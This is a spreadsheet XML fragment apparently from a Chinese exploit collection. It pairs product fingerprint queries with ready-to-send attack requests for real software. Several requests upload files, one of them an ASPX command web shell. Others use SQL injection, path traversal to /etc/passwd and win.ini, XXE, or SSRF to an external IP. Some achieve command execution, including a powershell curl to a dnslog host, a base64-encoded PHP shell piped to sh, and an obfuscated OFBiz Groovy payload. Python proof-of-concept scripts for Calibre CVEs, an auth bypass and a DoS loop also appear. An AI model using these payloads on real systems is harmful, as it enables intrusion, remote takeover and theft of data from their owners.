User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: application/xml, text/xml, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Content-Length: 93
Connection: close
type=saveAdmin&amp;id=2&amp;userName=audit&amp;pwd=audit@1234&amp;net=0.0.0.0&amp;mask=0.0.0.0&amp;port=ANY
&amp;allow=Y</t>
  </si>
  <si>
    <t>IP网络广播服务平台任意文件上传</t>
  </si>
  <si>
    <t>web.icon=="9091011a03bffd9898d79fc589a2c65d"</t>
  </si>
  <si>
    <t>POST /api/v2/remote-upgrade/upload HTTP/1.1
Host: 127.0.0.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Content-Type: multipart/form-data; boundary=----234561
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive
Content-Length: 149
------234561
Content-Disposition: form-data; name="file"; filename="../aa.php"
Content-Type: application/octet-stream
234561
------234561--</t>
  </si>
  <si>
    <t>赛蓝企业管理系统-SubmitUploadify-任意文件上传</t>
  </si>
  <si>
    <t>POST /EHRModule/EHR_Holidays/SubmitUploadify?FolderId=1&amp;UserId=1 HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like 
Gecko) Chrome/127.0.0.0 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryD5Mawpg068t7pbxZ
------WebKitFormBoundaryD5Mawpg068t7pbxZ
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: image/png
&lt;%@ Page Language="C#"%&gt;&lt;% 
Response.Write(111*111);System.IO.File.Delete(Server.MapPath(Request.Url.AbsolutePath)); %&gt;
------WebKitFormBoundaryD5Mawpg068t7pbxZ--</t>
  </si>
  <si>
    <t>瑞格智慧心理服务平台NPreenManage接口 SQL注入</t>
  </si>
  <si>
    <t>icon_hash="927574327"</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>POST</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> /NPreenManage/NPreenSMSList.asmx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length</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
SOAPAction:</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> "RuiGe.WebUi.NPreenSMS/Seach"</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&lt;Seach</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> xmlns="RuiGe.WebUi.NPreenSMS"&gt;</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
      &lt;sqlwhere&gt;string注入点&lt;/sqlwhere&gt;</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
    &lt;/Seach&gt;</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
  &lt;/soap:Body&gt;</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
&lt;/soap:Envelope&gt;</t>
    </r>
  </si>
  <si>
    <t>武汉地大信息工程股份有限公司基础信息平台 任意文件读取</t>
  </si>
  <si>
    <t>GET /SystemManage/BaseProject/GetImg?path=C:\windows\win.ini HTTP/1.1
Host: 
Cookie: ASP.NET_SessionId=rwqnflza5hjg0bunbihx43ci
Sec-Ch-Ua: "Not_A Brand";v="8", "Chromium";v="120"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36</t>
  </si>
  <si>
    <t>金万维异速联云联应用系统GNRemote 远程命令执行</t>
  </si>
  <si>
    <t>body="GNRemote.dll"</t>
  </si>
  <si>
    <t>GET /GNRemote.dll?GNFunction=CallPython&amp;pyFile=os&amp;pyFunc=system&amp;pyArgu=powershell+curl+xxx.dnslog.cn HTTP/1.1
Host: 
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip, deflate
Priority: u=0, i
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8</t>
  </si>
  <si>
    <t>蓝凌EIS智慧协同平台UniformEntry.aspx存在SQL注入漏洞(XVE-2024-19181)</t>
  </si>
  <si>
    <t>icon_hash="953405444"||app="Landray-OA系统"</t>
  </si>
  <si>
    <t>GET /third/DingTalk/Pages/UniformEntry.aspx?moduleid=1;WAITFOR+DELAY+'0:0:5'-- + HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)Gecko/20100101 Firefox/109.0</t>
  </si>
  <si>
    <t>世邦通信SPON-IP网络对讲广播系统addmediadata.php任意文件上传漏洞(XVE-2024-19281)</t>
  </si>
  <si>
    <t>icon_hash="-1830859634"</t>
  </si>
  <si>
    <t>POST /php/addmediadata.php HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US)
AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Content-Length: 514
Content-Type: multipart/form-data;boundary=de3b7a45ced9f35720e192ff54eb83908644f0ec70b3dc6fb19b6b5f08
Accept-Encoding: gzip, deflate, br
Connection: close
--de3b7a45ced9f35720e192ff54eb83908644f0ec70b3dc6fb19b6b5f0828
Content-Disposition: form-data; name="fullpath"
../
--de3b7a45ced9f35720e192ff54eb83908644f0ec70b3dc6fb19b6b5f0828
Content-Disposition: form-data; name="subpath"
/
--de3b7a45ced9f35720e192ff54eb83908644f0ec70b3dc6fb19b6b5f0828
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: application/octet-stream
&lt;?php echo md5(1);unlink(__FILE__);?&gt;
--de3b7a45ced9f35720e192ff54eb83908644f0ec70b3dc6fb19b6b5f0828--</t>
  </si>
  <si>
    <t>Apache-OFBiz授权不当致代码执行漏洞(CVE-2024-38856)</t>
  </si>
  <si>
    <t>app="Apache_OFBiz"</t>
  </si>
  <si>
    <t>POST /webtools/control/main/ProgramExport HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Content-Type: application/x-www-form-urlencoded
groovyProgram=\u0074\u0068\u0072\u006f\u0077\u0020\u006e\u0065\u0077\u0020\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0028\u0027\u0069\u0064\u0027\u002e\u0065\u0078\u0065\u0063\u0075\u0074\u0065\u0028\u0029\u002e\u0074\u0065\u0078\u0074\u0029\u003b</t>
  </si>
  <si>
    <t>易捷OA协同办公软件ShowPic接口存在任意文件读取</t>
  </si>
  <si>
    <t>body="/images/logon/bg_img.jpg"</t>
  </si>
  <si>
    <t>GET /servlet/ShowPic?filePath=../../windows/win.ini HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close</t>
  </si>
  <si>
    <t>宏景eHR系统ajaxService接口处存在SQL注入漏洞</t>
  </si>
  <si>
    <t>body="hjaxmanage.js" &amp;&amp; (body="/template/signature/encryptionlock/websocket.js" || body="/ajax/basic.js")</t>
  </si>
  <si>
    <t>/templates/index/getpassword.jsp
获取cookie payload：
POST /ajax/ajaxService HTTP/1.1
Host: 
Cookie: 抓到的cookie
Content-Type: application/x-www-form-urlencoded
__type=extTrans&amp;__xml={"functionId":"151211001137","sql":"select~20sys.fn_sqlvarbasetostr(HASHBYTES('MD5','1'))~20a~30~31~30~30~2c~31~20a~30~31~30~31~2c~31~20b~30~31~31~30~2c~31~20e~30~31~32~32~2c~31~20e~30~31a~31~2c~31~20dbase~2c~31~20a~30~30~30~30~20from~20operuser","nbase":"1"}</t>
  </si>
  <si>
    <t>满客宝智慧食堂系统selectUserByOrgId存在未授权访问漏洞</t>
  </si>
  <si>
    <t xml:space="preserve">icon_hash="-409875651" </t>
  </si>
  <si>
    <t>GET /yuding/selectUserByOrgId.action?record= HTTP/1.1
Host: 127.0.0.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close</t>
  </si>
  <si>
    <t>Calibre任意文件读取漏洞(CVE-2024-6781)</t>
  </si>
  <si>
    <t xml:space="preserve">#! /usr/bin/env python3
# Ldwk
# PoC for: CVE-2024-6781
import json
import sys
import requests
_target = "http://localhost:8080" # SET ME
_book_id = 1 # ensure book_id exists
def exploit(path):
    r = requests.post(
        f"{_target}/cdb/cmd/export",
        headers={"Content-Type": "application/json"},
        json=["extra_file", _book_id, path, ""],
    )
    try:
        print(r.json()["result"])
    except Exception:
        print(r.text)
if __name__ == "__main__":
    exploit("..\\..\\..\\Calibre Settings\\gui.json")
</t>
  </si>
  <si>
    <t>Calibre远程代码执行漏洞(CVE-2024-6782)</t>
  </si>
  <si>
    <t>#! /usr/bin/env python3
# PoC for: CVE-2024-6782
# Description: Unauthenticated remote code execution in 6.9.0 &lt;= calibre &lt;= 7.14.0
import json
import sys
import requests
_target = "http://localhost:8080"
def exploit(cmd):
    r = requests.post(
        f"{_target}/cdb/cmd/list",
        headers={"Content-Type": "application/json"},
        json=[
            ["template"],
            "", # sortby: leave empty
            "", # ascending: leave empty
            "", # search_text: leave empty, set to all
            1, # limit results
            f"python:def evaluate(a, b):\n import subprocess\n try:\n return subprocess.check_output(['cmd.exe', '/c', '{cmd}']).decode()\n except Exception:\n return subprocess.check_output(['sh', '-c', '{cmd}']).decode()", # payload
        ],
    )
    try:
        print(list(r.json()["result"]["data"]["template"].values())[0])
    except Exception as e:
        print(r.text)
if __name__ == "__main__":
    exploit("whami")</t>
  </si>
  <si>
    <t>Apache-HTTPServer-身份验证绕过</t>
  </si>
  <si>
    <t xml:space="preserve">import requests
# Configuration
proxy_url = "http://proxy-server.example.com"  # Change this to the proxy server's URL
backend_service_path = "/protected/resource"  # The path to the protected resource on the backend service
malicious_path = "/%2E%2E/protected/resource"  # Incorrectly encoded path to bypass authentication
# Malicious request to be sent via the proxy server
malicious_url = f"{proxy_url}{malicious_path}"
def send_malicious_request():
    try:
        # Send the crafted request to the proxy server
        response = requests.get(malicious_url)
        # Print the response details
        print("Status Code:", response.status_code)
        print("Response Headers:", response.headers)
        print("Response Body:", response.text)
        if response.status_code == 200:
            print("[+] Successfully bypassed authentication and accessed the protected resource.")
        else:
            print("[-] Failed to bypass authentication.")
    except Exception as e:
        print("[-] An error occurred:", str(e))
if __name__ == "__main__":
    send_malicious_request()
</t>
  </si>
  <si>
    <t>Apache-Tomcat-拒绝服务</t>
  </si>
  <si>
    <t xml:space="preserve">import http.client
# Configuration
host = "target-server"  # Change this to the target server address
port = 443  # Change this to the target server port (usually 443 for HTTPS)
num_requests = 1000  # Number of requests to send
def send_dos_requests():
    try:
        # Create an HTTP/2 connection
        conn = http.client.HTTPSConnection(host, port, timeout=10)
        headers = {
            "Content-Type": "application/x-www-form-urlencoded",
            "X-Test-Header": "A" * 65536  # Large header value to exceed limits
        }
        for i in range(num_requests):
            conn.request("POST", "/", headers=headers)
            response = conn.getresponse()
            print(f"Request {i + 1}: Status Code: {response.status}")
        conn.close()
    except Exception as e:
        print(f"[-] An error occurred: {e}")
if __name__ == "__main__":
    print(f"Sending {num_requests} HTTP/2 requests to {host}:{port}")
    send_dos_requests()
</t>
  </si>
  <si>
    <t>Journyx-项目管理软件-XXE</t>
  </si>
  <si>
    <t>body="Journyx"</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>POST</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> /jtcgi/soap_cgi.pyc</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User-Agent:Mozilla/5.0</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> (WindowsNT10.0;Win64;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likeGecko)Chrome/96.0.4664.93Safari/537.36</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
Content-Type:</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> application/xml</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
&lt;?xml</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> version="1.0"?&gt;&lt;!DOCTYPE</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> root</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> [&lt;!ENTITY</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> test</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> SYSTEM</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> "file:///etc/passwd"&gt;]&gt;&lt;soapenv:Envelope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 xml:space="preserve">"&gt;&lt;soapenv:Header/&gt;&lt;soapenv:Body&gt;&lt;changeUserPassword&gt;&lt;username&gt;&amp;test;&lt;/username&gt;&lt;curpwd&gt;zzz&lt;/curpwd&gt;&lt;newpwd&gt;zzz123&lt;/newpwd&gt;&lt;/changeUserPassword&gt;&lt;/soapenv:Body&gt;&lt;/soapenv:Envelope&gt;
</t>
    </r>
  </si>
  <si>
    <t>开源-Atmail-SQL</t>
  </si>
  <si>
    <t xml:space="preserve">POST /index.php/admin/index/login HTTP/1.1
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: https://ip:port/
Content-Length: 153
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Host: ip:port
Connection: Keep-alive
Language=ca&amp;Password=1&amp;Username=admin'XOR(if(now()=sysdate()%2Csleep(6)%2C0))XOR'Z&amp;login=1&amp;send=1&amp;server=https://ip:port/
</t>
  </si>
  <si>
    <t>Mtab-书签导航程序-SQL</t>
  </si>
  <si>
    <t>title="Mtab书签"</t>
  </si>
  <si>
    <t xml:space="preserve">POST /LinkStore/getIcon HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Content-Type: application/json
Connection: Keep-alive
{"url":"'XOR(if(now()=sysdate(),sleep(5),0))XOR'"}
</t>
  </si>
  <si>
    <t>龙腾-CMS-任意文件读取</t>
  </si>
  <si>
    <t xml:space="preserve">GET /api/file/downloadFile?file=../../../../../../../../../../../../../../../../../etc/passwd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</si>
  <si>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龙腾-CMS-SSRF</t>
  </si>
  <si>
    <t xml:space="preserve">GET /api/file/downloadUrl?file=http://124.221.70.199:8888/c.php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</si>
  <si>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Windows RDL存在远程代码执行漏洞（CVE-2024-38077）</t>
  </si>
  <si>
    <r>
      <rPr>
        <u/>
        <sz val="10"/>
        <color rgb="FF175CEB"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>https://support.sangfor.com.cn/productTool/read?product_id=201&amp;id=84&amp;category_id=0</t>
    </r>
  </si>
  <si>
    <t>泛微emobile /install/updatePlugin.do 鉴权绕过漏洞</t>
  </si>
  <si>
    <t>同享人力资源管理系统hdlUploadFile.ashx存在文件上传漏洞</t>
  </si>
  <si>
    <t>POST /MobileService/Web/Handler/hdlUploadFile.ashx?puser=../../../Style/rce HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.2558.72 Safari/537.36
Content-Type: multipart/form-data;boundary =---------------------------142851345723692939351758052805
Connection: close
-----------------------------142851345723692939351758052805
Content-Disposition: form-data; name="Filedata"; filename="rce.aspx"
Content-Type: text/plain
&lt;%@ Page Language="Jscript" validateRequest="false" %&gt;
&lt;%
var c=new System.Diagnostics.ProcessStartInfo("cmd");
var e=new System.Diagnostics.Process();
var out:System.IO.StreamReader,EI:System.IO.StreamReader;
c.UseShellExecute=false;
c.RedirectStandardOutput=true;
c.RedirectStandardError=true;
e.StartInfo=c;
c.Arguments="/c " + Request.Item["cmd"];
e.Start();
out=e.StandardOutput;
EI=e.StandardError;
e.Close();
Response.Write(out.ReadToEnd() + EI.ReadToEnd());
System.IO.File.Delete(Request.PhysicalPath);
Response.End();%&gt;
-----------------------------142851345723692939351758052805--</t>
  </si>
  <si>
    <t>亿赛通电子文档安全管理系统DecryptionApp存在反序列化漏洞</t>
  </si>
  <si>
    <t>POST /CDGServer3/DecryptionApp?command=GETSYSTEMINFO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</si>
  <si>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亿赛通电子文档安全管理系统docRenewApp存在反序列化漏洞</t>
  </si>
  <si>
    <t>POST /CDGServer3/docRenewApp?command=GETSYSTEMINFO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</si>
  <si>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亿赛通电子文档安全管理系统SecureUsbConnection存在反序列化漏洞</t>
  </si>
  <si>
    <t>POST /CDGServer3/SecureUsbConnection?command=GETSYSTEMINFO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</si>
  <si>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ALR-F800存在命令执行漏洞</t>
  </si>
  <si>
    <t>"ALR-F800"</t>
  </si>
  <si>
    <t xml:space="preserve">POST /cmd.php HTTP/1.1
Host: 
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
cmd=help
重置密码
POST /cmd.php HTTP/1.1
Host: VULNERABLE_SERVER_IP
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
cmd=password=password
Web 界面和 SSH 的默认帐户（用户名 Alien）的密码将重置为密码 password
通过上面修改了web页面密码，进行修改Authorization认证，再通过下面请求包进行getshell
POST /cgi-bin/upgrade.cgi HTTP/1.1
Host: VULNERABLE_SERVER_IP
Authorization: Basic YWxpZW46cGFzc3dvcmQ=
Content-Length: 301
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryQ3keNKAe5AQ9G7bs
------WebKitFormBoundaryQ3keNKAe5AQ9G7bs
Content-Disposition: form-data; name="uploadedFile"; filename=";echo ZWNobyAiPD9waHAgZXZhbChcJF9SRVFVRVNUWydjbWQnXSk7Pz4iID4gL3Zhci93d3cvc2hlbGwucGhw| base64 -d | sh"
Content-Type: application/octet-stream
Hi！
------WebKitFormBoundaryQ3keNKAe5AQ9G7bs
WebShell将被写入：
https://VULNERABLE_SERVER_IP//shell.php?cmd=phpinfo();
POST /admin/system.html HTTP/1.1
Host: VULNERABLE_SERVER_IP
Content-Length: 412
Cache-Control: max-age=0
Authorization: Digest username="alien", realm="Authorized users only", nonce="e01f9b86814aced6260f94fdfc978b21", uri="/admin/system.html", response="cbc415aecfcceb4a4afa23973960b8da", qop=auth, nc=000000cc, cnonce="dd03b48ea65cac94" #REPLACE THIS
Connection: keep-alive
------WebKitFormBoundaryJpks6wYXiOago8MS
Content-Disposition: form-data; name="upload_max_filesize"
3M
------WebKitFormBoundaryJpks6wYXiOago8MS
Content-Disposition: form-data; name="uploadedFile"; filename=";whoami"
Content-Type: application/octet-stream
123
------WebKitFormBoundaryJpks6wYXiOago8MS
Content-Disposition: form-data; name="action"
Install
------WebKitFormBoundaryJpks6wYXiOago8MS--
</t>
  </si>
  <si>
    <t>Atmail存在SQL注入漏洞</t>
  </si>
  <si>
    <t>POST /index.php/admin/index/login HTTP/1.1
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: https://ip:port/
Content-Length: 153
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Host: ip:port
Connection: Keep-alive
Language=ca&amp;Password=1&amp;Username=admin'XOR(if(now()=sysdate()%2Csleep(6)%2C0))XOR'Z&amp;login=1&amp;send=1&amp;server=https://ip:port/</t>
  </si>
  <si>
    <t>ELADMIN后台管理系统存在SSRF漏洞</t>
  </si>
  <si>
    <t>"ELADMIN"</t>
  </si>
  <si>
    <t>JeecgBoot系统AviatorScript表达式注入漏洞</t>
  </si>
  <si>
    <t>body="jeecg-boot"</t>
  </si>
  <si>
    <t>POST /jeecg-boot/jmreport/save?previousPage=xxx&amp;jmLink=YWFhfHxiYmI=&amp;token=123 HTTP/1.1
Host: 192.168.37.1:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: application/json, text/plain, */*
Content-Type: application/json
Content-Length: 3456
{
    "loopBlockList": [],
    "area": false,
    "printElWidth": 718,
    "excel_config_id": "980882669965455363",
    "printElHeight": 1047,
    "rows": {
        "4": {
            "cells": {
                "4": {
                    "text": "=(use org.springframework.cglib.core.*;use org.springframework.util.*;ReflectUtils.defineClass('test', Base64Utils.decodeFromString('yv66vgAAADQANgoACQAlCgAmACcIACgKACYAKQcAKgcAKwoABgAsBwAtBwAuAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBAAZMdGVzdDsBAAl0cmFuc2Zvcm0BAHIoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007W0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhkb2N1bWVudAEALUxjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NOwEACGhhbmRsZXJzAQBCW0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKRXhjZXB0aW9ucwcALwEApihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhpdGVyYXRvcgEANUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7AQAHaGFuZGxlcgEAQUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAIPGNsaW5pdD4BAAFlAQAVTGphdmEvaW8vSU9FeGNlcHRpb247AQANU3RhY2tNYXBUYWJsZQcAKgEAClNvdXJjZUZpbGUBAAl0ZXN0LmphdmEMAAoACwcAMAwAMQAyAQAEY2FsYwwAMwA0AQATamF2YS9pby9JT0V4Y2VwdGlvbgEAGmphdmEvbGFuZy9SdW50aW1lRXhjZXB0aW9uDAAKADUBAAR0ZXN0AQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEAOWNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9UcmFuc2xldEV4Y2VwdGlvbgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBABgoTGphdmEvbGFuZy9UaHJvd2FibGU7KVYAIQAIAAkAAAAAAAQAAQAKAAsAAQAMAAAALwABAAEAAAAFKrcAAbEAAAACAA0AAAAGAAEAAAAJAA4AAAAMAAEAAAAFAA8AEAAAAAEAEQASAAIADAAAAD8AAAADAAAAAbEAAAACAA0AAAAGAAEAAAAWAA4AAAAgAAMAAAABAA8AEAAAAAAAAQATABQAAQAAAAEAFQAWAAIAFwAAAAQAAQAYAAEAEQAZAAIADAAAAEkAAAAEAAAAAbEAAAACAA0AAAAGAAEAAAAbAA4AAAAqAAQAAAABAA8AEAAAAAAAAQATABQAAQAAAAEAGgAbAAIAAAABABwAHQADABcAAAAEAAEAGAAIAB4ACwABAAwAAABmAAMAAQAAABe4AAISA7YABFenAA1LuwAGWSq3AAe/sQABAAAACQAMAAUAAwANAAAAFgAFAAAADQAJABAADAAOAA0ADwAWABEADgAAAAwAAQANAAkAHwAgAAAAIQAAAAcAAkwHACIJAAEAIwAAAAIAJA=='), ClassLoader.getSystemClassLoader());)",
                    "style": 0
                }
            },
            "height": 25
        },
        "len": 96,
        "-1": {
            "cells": {
                "-1": {
                    "text": "${gongsi.id}"
                }
            },
            "isDrag": true
        }
    },
    "dbexps": [],
    "toolPrintSizeObj": {
        "printType": "A4",
        "widthPx": 718,
        "heightPx": 1047
    },
    "dicts": [],
    "freeze": "A1",
    "dataRectWidth": 701,
    "background": false,
    "name": "sheet1",
    "autofilter": {},
    "styles": [
        {
            "align": "center"
        }
    ],
    "validations": [],
    "cols": {
        "4": {
            "width": 95
        },
        "len": 50
    },
    "merges": [
        "E4:F4",
        "B4:B5",
        "C4:C5",
        "D4:D5",
        "G4:G5",
        "H4:H5",
        "I4:I5",
        "D1:G1",
        "H3:I3"
    ]
}
POST /jeecg-boot/jmreport/show?previousPage=xxx&amp;jmLink=YWFhfHxiYmI= HTTP/1.1
Host: 192.168.37.1:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: application/json, text/plain, */*
Content-Type: application/json
Content-Length: 42
{
    "id": "980882669965455363"
}</t>
  </si>
  <si>
    <t>Journyx存在未经身份验证的XML外部实体注入</t>
  </si>
  <si>
    <t>"Journyx"</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>POST</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> /jtcgi/soap_cgi.pyc</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Accept:</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> */*</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
